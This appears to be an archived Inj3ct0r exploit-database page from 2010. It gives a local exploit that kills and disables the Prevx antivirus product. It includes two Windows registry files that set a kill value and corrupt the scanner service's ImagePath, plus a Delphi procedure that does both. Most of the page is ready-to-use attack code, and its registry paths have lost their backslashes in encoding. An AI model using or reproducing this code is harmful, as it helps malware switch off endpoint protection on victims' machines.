[local exploits] - Prevx Registry value “KCSIâ
Posted on 10 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Prevx Registry value “KCSI†Exploit | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Prevx Registry value “KCSI†Exploit by STRELiTZIA in local exploits | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=================================== Prevx Registry value “KCSI†Exploit =================================== Prevx, trying to read the data contained in the registry valueâ€PCSIKCSIâ€, and eventually make it null if it contains data different than zero. Roots and keys: HKLMSOFTWAREPCSIKCSI HKCUSoftwarePCSIKCSI HKU.DEFAULTSoftwarePCSIKCSI Value : KCSI Data type : REG_DWORD Data value : $00000001 This value does not exist when you install Prevx, but he continually seeks it every time. By changing the data stored in this value to “1â€, Prevx was killed instantly, but Prevx processes resurrected. To bypass resurrection, we can corrupt service or drivers keys values by synchronizing modification after the process is completed or using Loop to write 1 every second. Settings: - Turn 'ON' Monitoring to get MAXIMUM Protection (this option prevents any Prevx registry keys malicious modification). Use Windows registry file to add new values: ------ KillPrevxOneTime.reg -------- Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINESOFTWAREPCSI] "KCSI"=dword:00000001 --------- CorruptCSIScanner.reg ---------- Windows Registry Editor Version 5.00 ;Corrupt ImagePath to ""C:Program FilesPrevxprevx1.exe" /service"; [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesCSIScanner] "ImagePath"=hex(2):22,00,43,00,3a,00,5c,00,50,00,72,00,6f,00,67,00,72,00,61,00, 6d,00,20,00,46,00,69,00,6c,00,65,00,73,00,5c,00,50,00,72,00,65,00,76,00,78, 00,5c,00,70,00,72,00,65,00,76,00,78,00,31,00,2e,00,65,00,78,00,65,00,22,00, 20,00,2f,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,00,00 Launch†KillPrevxOneTime.reg†then “CorruptCSIScanner.regâ€, you must synchronizing these operations. Delphi part of code without optimization and checks: procedure KillPx(); var Reg: TRegistry; begin Reg := TRegistry.Create; Reg.RootKey := HKEY_LOCAL_MACHINE; Reg.OpenKey('SOFTWAREPCSI', False); Reg.WriteInteger('KCSI', $00000001); Sleep(1500); Reg.OpenKey('SYSTEMCurrentControlSetServicesCSIScanner', False); Reg.WriteExpandString('ImagePath', '"C:Program FilesPrevxprevx1.exe" /service'); Reg.CloseKey; Reg.Free; end; c) 2010 STRELiTZIA # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-10]</pre></body></html>
